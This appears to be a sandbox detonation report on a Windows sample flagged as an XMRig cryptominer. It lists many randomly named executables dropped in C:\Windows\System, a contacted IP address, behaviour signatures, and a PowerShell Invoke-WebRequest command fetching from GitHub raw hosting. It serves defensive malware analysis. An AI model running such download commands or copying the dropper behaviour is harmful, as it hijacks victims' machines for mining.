C:\Windows\System\TQLzczJ.exe

C:\Windows\System\fVrAJcR.exe

C:\Windows\System\fVrAJcR.exe

C:\Windows\System\CNdMbVl.exe

C:\Windows\System\CNdMbVl.exe

C:\Windows\System\fDWSKgN.exe

C:\Windows\System\fDWSKgN.exe

C:\Windows\System\oTVEhbI.exe

C:\Windows\System\oTVEhbI.exe

C:\Windows\System\nEOuXhY.exe

C:\Windows\System\nEOuXhY.exe

C:\Windows\System\eXqeajH.exe

C:\Windows\System\eXqeajH.exe

C:\Windows\System\nwogtRQ.exe

C:\Windows\System\nwogtRQ.exe

C:\Windows\System\sBDHhwT.exe

C:\Windows\System\sBDHhwT.exe

C:\Windows\System\dBtYUZe.exe

C:\Windows\System\dBtYUZe.exe

C:\Windows\System\yIaGOrm.exe

C:\Windows\System\yIaGOrm.exe

C:\Windows\System\PdsPGPa.exe

C:\Windows\System\PdsPGPa.exe

C:\Windows\System\uUmUmgC.exe

C:\Windows\System\uUmUmgC.exe

C:\Windows\System\ZpBJmcJ.exe

C:\Windows\System\ZpBJmcJ.exe

C:\Windows\System\QKFETpS.exe

C:\Windows\System\QKFETpS.exe

C:\Windows\System\KqzznFC.exe

C:\Windows\System\KqzznFC.exe

C:\Windows\System\QCmFQZH.exe

C:\Windows\System\QCmFQZH.exe

C:\Windows\System\aBzcawI.exe

C:\Windows\System\aBzcawI.exe

C:\Windows\System\QGmbyiu.exe

C:\Windows\System\QGmbyiu.exe

C:\Windows\System\CkgfhGE.exe

C:\Windows\System\CkgfhGE.exe

C:\Windows\System\gbnsFFA.exe

C:\Windows\System\gbnsFFA.exe

C:\Windows\System\TzKcxas.exe

C:\Windows\System\TzKcxas.exe

C:\Windows\System\ATDEpjG.exe

C:\Windows\System\ATDEpjG.exe

C:\Windows\System\TbFLPus.exe

C:\Windows\System\TbFLPus.exe

C:\Windows\System\feiIWGX.exe

C:\Windows\System\feiIWGX.exe

C:\Windows\System\wvPdciO.exe

C:\Windows\System\wvPdciO.exe

C:\Windows\System\vAZeTFg.exe

C:\Windows\System\vAZeTFg.exe

C:\Windows\System\vheGRGW.exe

C:\Windows\System\vheGRGW.exe

C:\Windows\System\YMCVxeq.exe

C:\Windows\System\YMCVxeq.exe

C:\Windows\System\QIVXAbM.exe

C:\Windows\System\QIVXAbM.exe

C:\Windows\System\PHviehT.exe

C:\Windows\System\PHviehT.exe

C:\Windows\System\lDuNCiE.exe

C:\Windows\System\lDuNCiE.exe

C:\Windows\System\voDrFgO.exe

C:\Windows\System\voDrFgO.exe

C:\Windows\System\JUEggex.exe

C:\Windows\System\JUEggex.exe

C:\Windows\System\bkwOGWM.exe

C:\Windows\System\bkwOGWM.exe

C:\Windows\System\THzXBSa.exe

C:\Windows\System\THzXBSa.exe

C:\Windows\System\zQPkpuI.exe

C:\Windows\System\zQPkpuI.exe

C:\Windows\System\jNJEYYz.exe

C:\Windows\System\jNJEYYz.exe

C:\Windows\System\DKqzncN.exe

C:\Windows\System\DKqzncN.exe

C:\Windows\System\sfOuque.exe

C:\Windows\System\sfOuque.exe

C:\Windows\System\pLEfPWv.exe

C:\Windows\System\pLEfPWv.exe

C:\Windows\System\rVMHxSP.exe

C:\Windows\System\rVMHxSP.exe

C:\Windows\System\EToHoaY.exe

C:\Windows\System\EToHoaY.exe

C:\Windows\System\trcHDnW.exe

C:\Windows\System\trcHDnW.exe

C:\Windows\System\HZVVKBD.exe

C:\Windows\System\HZVVKBD.exe

C:\Windows\System\NANSPUi.exe

C:\Windows\System\NANSPUi.exe

C:\Windows\System\vUtPFwG.exe

C:\Windows\System\vUtPFwG.exe

C:\Windows\System\YmzpaQF.exe

C:\Windows\System\YmzpaQF.exe

C:\Windows\System\ksdgtSm.exe

C:\Windows\System\ksdgtSm.exe

C:\Windows\System\ezMWDES.exe

C:\Windows\System\ezMWDES.exe

C:\Windows\System\LLOxjoI.exe

C:\Windows\System\LLOxjoI.exe

C:\Windows\System\aoFNgwC.exe

C:\Windows\System\aoFNgwC.exe

C:\Windows\System\RGdFEtW.exe

C:\Windows\System\RGdFEtW.exe

C:\Windows\System\lxvRpwc.exe

C:\Windows\System\lxvRpwc.exe

C:\Windows\System\pZnFyGy.exe

C:\Windows\System\pZnFyGy.exe

C:\Windows\System\JidgFNj.exe

C:\Windows\System\JidgFNj.exe

C:\Windows\System\CLojOOn.exe

C:\Windows\System\CLojOOn.exe

C:\Windows\System\qjrCUCn.exe

C:\Windows\System\qjrCUCn.exe

C:\Windows\System\REFKhda.exe

C:\Windows\System\REFKhda.exe

C:\Windows\System\jOHjMxK.exe

C:\Windows\System\jOHjMxK.exe

C:\Windows\System\fhOUIya.exe

C:\Windows\System\fhOUIya.exe

C:\Windows\System\TNvFQYl.exe

C:\Windows\System\TNvFQYl.exe

C:\Windows\System\SJLyRcd.exe

C:\Windows\System\SJLyRcd.exe

C:\Windows\System\JljmUtW.exe

C:\Windows\System\JljmUtW.exe

C:\Windows\System\PodRmbA.exe

C:\Windows\System\PodRmbA.exe

C:\Windows\System\saOcDhG.exe

C:\Windows\System\saOcDhG.exe

C:\Windows\System\MRzLJdP.exe

C:\Windows\System\MRzLJdP.exe

C:\Windows\System\eqTSbTF.exe

C:\Windows\System\eqTSbTF.exe

C:\Windows\System\YOCyTUl.exe

C:\Windows\System\YOCyTUl.exe

C:\Windows\System\tlxnUnw.exe

C:\Windows\System\tlxnUnw.exe

C:\Windows\System\cediUEX.exe

C:\Windows\System\cediUEX.exe

C:\Windows\System\RsAYvrQ.exe

C:\Windows\System\RsAYvrQ.exe

C:\Windows\System\uvZmGwI.exe

C:\Windows\System\uvZmGwI.exe

C:\Windows\System\bkUwXoN.exe

C:\Windows\System\bkUwXoN.exe

C:\Windows\System\IIFihhc.exe

C:\Windows\System\IIFihhc.exe

C:\Windows\System\xSyomQk.exe

C:\Windows\System\xSyomQk.exe

C:\Windows\System\TjeMddG.exe

C:\Windows\System\TjeMddG.exe

C:\Windows\System\QGyNrZV.exe

C:\Windows\System\QGyNrZV.exe

C:\Windows\System\dRwLzZI.exe

C:\Windows\System\dRwLzZI.exe

C:\Windows\System\Dztlray.exe

C:\Windows\System\Dztlray.exe

C:\Windows\System\pgBzlgL.exe

C:\Windows\System\pgBzlgL.exe

C:\Windows\System\EaSqyQe.exe

C:\Windows\System\EaSqyQe.exe

C:\Windows\System\kvSFvZX.exe

C:\Windows\System\kvSFvZX.exe

C:\Windows\System\flrbROd.exe

C:\Windows\System\flrbROd.exe

C:\Windows\System\qrZtaxQ.exe

C:\Windows\System\qrZtaxQ.exe

C:\Windows\System\MznoBWn.exe

C:\Windows\System\MznoBWn.exe

C:\Windows\System\tFYWpmI.exe

C:\Windows\System\tFYWpmI.exe

C:\Windows\System\sBqaUHD.exe

C:\Windows\System\sBqaUHD.exe

C:\Windows\System\zWZYpfe.exe

C:\Windows\System\zWZYpfe.exe

C:\Windows\System\bQTTxhj.exe

C:\Windows\System\bQTTxhj.exe

C:\Windows\System\bPAQUWj.exe

C:\Windows\System\bPAQUWj.exe

C:\Windows\System\GkAvvPp.exe

C:\Windows\System\GkAvvPp.exe

C:\Windows\System\YhdJULd.exe

C:\Windows\System\YhdJULd.exe

C:\Windows\System\eUFSyKL.exe

C:\Windows\System\eUFSyKL.exe

C:\Windows\System\aMkqFmP.exe

C:\Windows\System\aMkqFmP.exe

C:\Windows\System\XoQYUOR.exe

C:\Windows\System\XoQYUOR.exe

C:\Windows\System\rBTrtdN.exe

C:\Windows\System\rBTrtdN.exe

C:\Windows\System\frimMWy.exe

C:\Windows\System\frimMWy.exe

C:\Windows\System\MoXpsjh.exe

C:\Windows\System\MoXpsjh.exe

C:\Windows\System\AUxyxpG.exe

C:\Windows\System\AUxyxpG.exe

C:\Windows\System\jHNDrxY.exe

C:\Windows\System\jHNDrxY.exe

C:\Windows\System\xTjfmbv.exe

C:\Windows\System\xTjfmbv.exe

C:\Windows\System\ZOPsZTo.exe

C:\Windows\System\ZOPsZTo.exe

C:\Windows\System\RbfekIh.exe

C:\Windows\System\RbfekIh.exe

C:\Windows\System\hkWRXme.exe

C:\Windows\System\hkWRXme.exe

C:\Windows\System\cUALDWB.exe

C:\Windows\System\cUALDWB.exe

C:\Windows\System\INvNpoz.exe

C:\Windows\System\INvNpoz.exe

C:\Windows\System\LMtWQqk.exe

C:\Windows\System\LMtWQqk.exe

C:\Windows\System\AKJrTAj.exe

C:\Windows\System\AKJrTAj.exe

C:\Windows\System\ZyChzAf.exe

C:\Windows\System\ZyChzAf.exe

C:\Windows\System\WhUtcIh.exe

C:\Windows\System\WhUtcIh.exe

C:\Windows\System\FdggskK.exe

C:\Windows\System\FdggskK.exe

C:\Windows\System\lGdHKnh.exe

C:\Windows\System\lGdHKnh.exe

C:\Windows\System\Fmqiwvo.exe

C:\Windows\System\Fmqiwvo.exe

C:\Windows\System\awjbwoD.exe

C:\Windows\System\awjbwoD.exe

C:\Windows\System\FUYtHjU.exe

C:\Windows\System\FUYtHjU.exe

C:\Windows\System\niIqlyl.exe

C:\Windows\System\niIqlyl.exe

C:\Windows\System\WtDlJSe.exe

C:\Windows\System\WtDlJSe.exe

C:\Windows\System\eTyIHWo.exe

C:\Windows\System\eTyIHWo.exe

C:\Windows\System\kbwXRjc.exe

C:\Windows\System\kbwXRjc.exe

C:\Windows\System\MdXigXY.exe

C:\Windows\System\MdXigXY.exe

C:\Windows\System\QTdNGtu.exe

C:\Windows\System\QTdNGtu.exe

C:\Windows\System\eZnSwcR.exe

C:\Windows\System\eZnSwcR.exe

C:\Windows\System\yRktHfI.exe

C:\Windows\System\yRktHfI.exe

C:\Windows\System\YEgaINJ.exe

C:\Windows\System\YEgaINJ.exe

C:\Windows\System\zcvDZXq.exe

C:\Windows\System\zcvDZXq.exe

C:\Windows\System\uAUViom.exe

C:\Windows\System\uAUViom.exe

C:\Windows\System\oHlIZcA.exe

C:\Windows\System\oHlIZcA.exe

C:\Windows\System\rOsmriR.exe

C:\Windows\System\rOsmriR.exe

C:\Windows\System\SyDExIz.exe

C:\Windows\System\SyDExIz.exe

C:\Windows\System\fAHmiWr.exe

C:\Windows\System\fAHmiWr.exe

C:\Windows\System\FChgKuH.exe

C:\Windows\System\FChgKuH.exe

C:\Windows\System\GQNlZzk.exe

C:\Windows\System\GQNlZzk.exe

C:\Windows\System\vfFzGkf.exe

C:\Windows\System\vfFzGkf.exe

C:\Windows\System\FqoFeEl.exe

C:\Windows\System\FqoFeEl.exe

C:\Windows\System\hICQFWN.exe

C:\Windows\System\hICQFWN.exe

C:\Windows\System\UWoXZAU.exe

C:\Windows\System\UWoXZAU.exe

C:\Windows\System\aLFMtJV.exe

C:\Windows\System\aLFMtJV.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 17:25

Reported

2024-05-27 17:28

Platform

win10v2004-20240426-en

Max time kernel

145s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3784 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\031e046b878eb96135046d06718e5070_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\IWrrFpy.exe

C:\Windows\System\IWrrFpy.exe

C:\Windows\System\kkFqmWZ.exe

C:\Windows\System\kkFqmWZ.exe

C:\Windows\System\JRiOIqT.exe

C:\Windows\System\JRiOIqT.exe

C:\Windows\System\LALKtrb.exe

C:\Windows\System\LALKtrb.exe

C:\Windows\System\dlnKVKG.exe

C:\Windows\System\dlnKVKG.exe

C:\Windows\System\VWpOkEm.exe

C:\Windows\System\VWpOkEm.exe

C:\Windows\System\kgqgKOV.exe

C:\Windows\System\kgqgKOV.exe

C:\Windows\System\xsIlibT.exe

C:\Windows\System\xsIlibT.exe

C:\Windows\System\cMknklI.exe

C:\Windows\System\cMknklI.exe

C:\Windows\System\bjMHfzJ.exe

C:\Windows\System\bjMHfzJ.exe

C:\Windows\System\bPvvYfB.exe

C:\Windows\System\bPvvYfB.exe

C:\Windows\System\TkQrpYj.exe

C:\Windows\System\TkQrpYj.exe

C:\Windows\System\tmmdXqe.exe

C:\Windows\System\tmmdXqe.exe

C:\Windows\System\JfuDjMy.exe

C:\Windows\System\JfuDjMy.exe

C:\Windows\System\wYnfYrK.exe

C:\Windows\System\wYnfYrK.exe

C:\Windows\System\QAUdNQo.exe

C:\Windows\System\QAUdNQo.exe

C:\Windows\System\BwUaakH.exe

C:\Windows\System\BwUaakH.exe

C:\Windows\System\fBRiEXJ.exe

C:\Windows\System\fBRiEXJ.exe

C:\Windows\System\yAOhbtg.exe

C:\Windows\System\yAOhbtg.exe

C:\Windows\System\JMigboj.exe

C:\Windows\System\JMigboj.exe

C:\Windows\System\lbWFGwe.exe

C:\Windows\System\lbWFGwe.exe

C:\Windows\System\lwiYrui.exe

C:\Windows\System\lwiYrui.exe

C:\Windows\System\OhvBhLi.exe

C:\Windows\System\OhvBhLi.exe

C:\Windows\System\mJROEXF.exe

C:\Windows\System\mJROEXF.exe

C:\Windows\System\oSlVUod.exe

C:\Windows\System\oSlVUod.exe

C:\Windows\System\wbBddHX.exe

C:\Windows\System\wbBddHX.exe

C:\Windows\System\OQuJjsQ.exe

C:\Windows\System\OQuJjsQ.exe

C:\Windows\System\xzTDVPW.exe

C:\Windows\System\xzTDVPW.exe

C:\Windows\System\KOkijhU.exe

C:\Windows\System\KOkijhU.exe

C:\Windows\System\jjmFGtu.exe

C:\Windows\System\jjmFGtu.exe

C:\Windows\System\goPUQNB.exe

C:\Windows\System\goPUQNB.exe

C:\Windows\System\jLrvzEA.exe

C:\Windows\System\jLrvzEA.exe

C:\Windows\System\FTMbgEJ.exe

C:\Windows\System\FTMbgEJ.exe

C:\Windows\System\fDrdLwL.exe

C:\Windows\System\fDrdLwL.exe

C:\Windows\System\lMNHHAt.exe

C:\Windows\System\lMNHHAt.exe

C:\Windows\System\dspVNhB.exe

C:\Windows\System\dspVNhB.exe

C:\Windows\System\LwZYEjy.exe

C:\Windows\System\LwZYEjy.exe

C:\Windows\System\AVQuBPJ.exe

C:\Windows\System\AVQuBPJ.exe

C:\Windows\System\bQUVTHx.exe

C:\Windows\System\bQUVTHx.exe

C:\Windows\System\mLxrDIS.exe

C:\Windows\System\mLxrDIS.exe

C:\Windows\System\AGArdzC.exe

C:\Windows\System\AGArdzC.exe

C:\Windows\System\DIdBHVV.exe

C:\Windows\System\DIdBHVV.exe

C:\Windows\System\JEXEeHu.exe

C:\Windows\System\JEXEeHu.exe

C:\Windows\System\jEHmnUz.exe

C:\Windows\System\jEHmnUz.exe

C:\Windows\System\WRWViKe.exe

C:\Windows\System\WRWViKe.exe

C:\Windows\System\vtHtNNI.exe

C:\Windows\System\vtHtNNI.exe

C:\Windows\System\pxzBilj.exe

C:\Windows\System\pxzBilj.exe

C:\Windows\System\zcmweYf.exe

C:\Windows\System\zcmweYf.exe

C:\Windows\System\FzKvWBb.exe

C:\Windows\System\FzKvWBb.exe

C:\Windows\System\PxdBcpB.exe

C:\Windows\System\PxdBcpB.exe

C:\Windows\System\hzEMHJJ.exe

C:\Windows\System\hzEMHJJ.exe

C:\Windows\System\zAXWGKk.exe

C:\Windows\System\zAXWGKk.exe

C:\Windows\System\vHkunFm.exe

C:\Windows\System\vHkunFm.exe

C:\Windows\System\QvTLKyA.exe

C:\Windows\System\QvTLKyA.exe

C:\Windows\System\RBjwgOI.exe

C:\Windows\System\RBjwgOI.exe

C:\Windows\System\HEiwfCV.exe

C:\Windows\System\HEiwfCV.exe

C:\Windows\System\TPTsmja.exe

C:\Windows\System\TPTsmja.exe

C:\Windows\System\GlIXrHd.exe

C:\Windows\System\GlIXrHd.exe

C:\Windows\System\ufRyKUk.exe

C:\Windows\System\ufRyKUk.exe

C:\Windows\System\mfEbVUA.exe

C:\Windows\System\mfEbVUA.exe

C:\Windows\System\Klchvvs.exe

C:\Windows\System\Klchvvs.exe

C:\Windows\System\nJdeVSu.exe

C:\Windows\System\nJdeVSu.exe

C:\Windows\System\vxPLhgH.exe

C:\Windows\System\vxPLhgH.exe

C:\Windows\System\LMrFTix.exe

C:\Windows\System\LMrFTix.exe

C:\Windows\System\ZnBaShQ.exe

C:\Windows\System\ZnBaShQ.exe

C:\Windows\System\BmxqOiJ.exe

C:\Windows\System\BmxqOiJ.exe

C:\Windows\System\GCmnPcY.exe

C:\Windows\System\GCmnPcY.exe

C:\Windows\System\COMpJGx.exe

C:\Windows\System\COMpJGx.exe

C:\Windows\System\KBRgNag.exe

C:\Windows\System\KBRgNag.exe

C:\Windows\System\ssJJHYz.exe

C:\Windows\System\ssJJHYz.exe

C:\Windows\System\pTFbvrU.exe

C:\Windows\System\pTFbvrU.exe

C:\Windows\System\JGNwgBy.exe

C:\Windows\System\JGNwgBy.exe

C:\Windows\System\LwlGRcl.exe

C:\Windows\System\LwlGRcl.exe

C:\Windows\System\fQfWeAp.exe

C:\Windows\System\fQfWeAp.exe

C:\Windows\System\zMwDcNf.exe

C:\Windows\System\zMwDcNf.exe

C:\Windows\System\ekxuAPO.exe

C:\Windows\System\ekxuAPO.exe

C:\Windows\System\xBaHAXG.exe

C:\Windows\System\xBaHAXG.exe

C:\Windows\System\AoRWKcD.exe

C:\Windows\System\AoRWKcD.exe

C:\Windows\System\AmyvaVx.exe

C:\Windows\System\AmyvaVx.exe

C:\Windows\System\vNazwfV.exe

C:\Windows\System\vNazwfV.exe

C:\Windows\System\UWKJDad.exe

C:\Windows\System\UWKJDad.exe

C:\Windows\System\blalgRe.exe

C:\Windows\System\blalgRe.exe

C:\Windows\System\qUusOQq.exe

C:\Windows\System\qUusOQq.exe

C:\Windows\System\nemEzhl.exe

C:\Windows\System\nemEzhl.exe

C:\Windows\System\dVjFMEj.exe

C:\Windows\System\dVjFMEj.exe

C:\Windows\System\PHpjlNk.exe

C:\Windows\System\PHpjlNk.exe

C:\Windows\System\NfhkgiE.exe

C:\Windows\System\NfhkgiE.exe

C:\Windows\System\wHYpXUj.exe

C:\Windows\System\wHYpXUj.exe

C:\Windows\System\TaTdOWM.exe

C:\Windows\System\TaTdOWM.exe

C:\Windows\System\dIVRQql.exe

C:\Windows\System\dIVRQql.exe

C:\Windows\System\sabYnny.exe

C:\Windows\System\sabYnny.exe

C:\Windows\System\jaTObfg.exe

C:\Windows\System\jaTObfg.exe

C:\Windows\System\pAUPont.exe

C:\Windows\System\pAUPont.exe

C:\Windows\System\BtmRhMU.exe

C:\Windows\System\BtmRhMU.exe

C:\Windows\System\tvIfXnT.exe

C:\Windows\System\tvIfXnT.exe

C:\Windows\System\qAexXtO.exe

C:\Windows\System\qAexXtO.exe

C:\Windows\System\GDskmfy.exe

C:\Windows\System\GDskmfy.exe

C:\Windows\System\sYKRQVf.exe

C:\Windows\System\sYKRQVf.exe

C:\Windows\System\nEArESR.exe

C:\Windows\System\nEArESR.exe

C:\Windows\System\vQPSBfR.exe

C:\Windows\System\vQPSBfR.exe

C:\Windows\System\XCAEvNx.exe

C:\Windows\System\XCAEvNx.exe

C:\Windows\System\eqMLPvJ.exe

C:\Windows\System\eqMLPvJ.exe

C:\Windows\System\VWXFfFs.exe

C:\Windows\System\VWXFfFs.exe

C:\Windows\System\DjoCqiR.exe

C:\Windows\System\DjoCqiR.exe

C:\Windows\System\BVpqZjY.exe

C:\Windows\System\BVpqZjY.exe

C:\Windows\System\HeIqYoW.exe

C:\Windows\System\HeIqYoW.exe

C:\Windows\System\LKNaqMS.exe

C:\Windows\System\LKNaqMS.exe

C:\Windows\System\YswqokO.exe

C:\Windows\System\YswqokO.exe

C:\Windows\System\DXwjELp.exe

C:\Windows\System\DXwjELp.exe

C:\Windows\System\LySwniS.exe

C:\Windows\System\LySwniS.exe

C:\Windows\System\cJUAVat.exe

C:\Windows\System\cJUAVat.exe

C:\Windows\System\UmsUQBt.exe

C:\Windows\System\UmsUQBt.exe

C:\Windows\System\EiGBzjt.exe

C:\Windows\System\EiGBzjt.exe

C:\Windows\System\PhskQiG.exe

C:\Windows\System\PhskQiG.exe

C:\Windows\System\VqjTHgG.exe

C:\Windows\System\VqjTHgG.exe

C:\Windows\System\VMwcKWp.exe

C:\Windows\System\VMwcKWp.exe

C:\Windows\System\BpHjNIh.exe

C:\Windows\System\BpHjNIh.exe

C:\Windows\System\RjYIQwg.exe

C:\Windows\System\RjYIQwg.exe

C:\Windows\System\JSZzSGb.exe

C:\Windows\System\JSZzSGb.exe

C:\Windows\System\JtkKwwf.exe

C:\Windows\System\JtkKwwf.exe

C:\Windows\System\DfgFOyJ.exe

C:\Windows\System\DfgFOyJ.exe

C:\Windows\System\WzEIGTo.exe

C:\Windows\System\WzEIGTo.exe

C:\Windows\System\nSSitZP.exe

C:\Windows\System\nSSitZP.exe

C:\Windows\System\UvgLllT.exe

C:\Windows\System\UvgLllT.exe

C:\Windows\System\Riqxttg.exe

C:\Windows\System\Riqxttg.exe

C:\Windows\System\HPtLLDl.exe

C:\Windows\System\HPtLLDl.exe

C:\Windows\System\uTRQpZn.exe

C:\Windows\System\uTRQpZn.exe

C:\Windows\System\tWDISJh.exe

C:\Windows\System\tWDISJh.exe

C:\Windows\System\MFGaEHg.exe

C:\Windows\System\MFGaEHg.exe

C:\Windows\System\uimOsrF.exe

C:\Windows\System\uimOsrF.exe

C:\Windows\System\IxTDhOA.exe

C:\Windows\System\IxTDhOA.exe

C:\Windows\System\IIPhWbQ.exe

C:\Windows\System\IIPhWbQ.exe

C:\Windows\System\BvtxvLB.exe

C:\Windows\System\BvtxvLB.exe

C:\Windows\System\yabQGPO.exe

C:\Windows\System\yabQGPO.exe

C:\Windows\System\MhEHVih.exe

C:\Windows\System\MhEHVih.exe

C:\Windows\System\XmjBAvE.exe

C:\Windows\System\XmjBAvE.exe

C:\Windows\System\VfpGoRc.exe

C:\Windows\System\VfpGoRc.exe

C:\Windows\System\RTztehZ.exe

C:\Windows\System\RTztehZ.exe

C:\Windows\System\jyrjkod.exe

C:\Windows\System\jyrjkod.exe

C:\Windows\System\BgKrDjP.exe

C:\Windows\System\BgKrDjP.exe

C:\Windows\System\yPjQHsk.exe

C:\Windows\System\yPjQHsk.exe

C:\Windows\System\YlLrDGK.exe

C:\Windows\System\YlLrDGK.exe

C:\Windows\System\uHgENEx.exe

C:\Windows\System\uHgENEx.exe

C:\Windows\System\zQBpdqR.exe

C:\Windows\System\zQBpdqR.exe

C:\Windows\System\LMrFETR.exe

C:\Windows\System\LMrFETR.exe

C:\Windows\System\vwzPGus.exe

C:\Windows\System\vwzPGus.exe

C:\Windows\System\Dxkbcnz.exe

C:\Windows\System\Dxkbcnz.exe

C:\Windows\System\UcyojMI.exe

C:\Windows\System\UcyojMI.exe

C:\Windows\System\FFegSAw.exe

C:\Windows\System\FFegSAw.exe

C:\Windows\System\TZLurGL.exe

C:\Windows\System\TZLurGL.exe

C:\Windows\System\SwrjoHQ.exe

C:\Windows\System\SwrjoHQ.exe

C:\Windows\System\LTQMmiQ.exe

C:\Windows\System\LTQMmiQ.exe

C:\Windows\System\ECIzETg.exe

C:\Windows\System\ECIzETg.exe

C:\Windows\System\rGygFAq.exe

C:\Windows\System\rGygFAq.exe

C:\Windows\System\LOZlYOs.exe

C:\Windows\System\LOZlYOs.exe

C:\Windows\System\vRPKxUo.exe

C:\Windows\System\vRPKxUo.exe

C:\Windows\System\NwqmfOU.exe

C:\Windows\System\NwqmfOU.exe

C:\Windows\System\BvdvSiw.exe

C:\Windows\System\BvdvSiw.exe

C:\Windows\System\kzcCsvy.exe

C:\Windows\System\kzcCsvy.exe

C:\Windows\System\XrDitKI.exe

C:\Windows\System\XrDitKI.exe

C:\Windows\System\RiXvtIZ.exe

C:\Windows\System\RiXvtIZ.exe

C:\Windows\System\pnydHFH.exe

C:\Windows\System\pnydHFH.exe

C:\Windows\System\RSwjUYd.exe

C:\Windows\System\RSwjUYd.exe

C:\Windows\System\pgVZSez.exe

C:\Windows\System\pgVZSez.exe

C:\Windows\System\HhondrE.exe

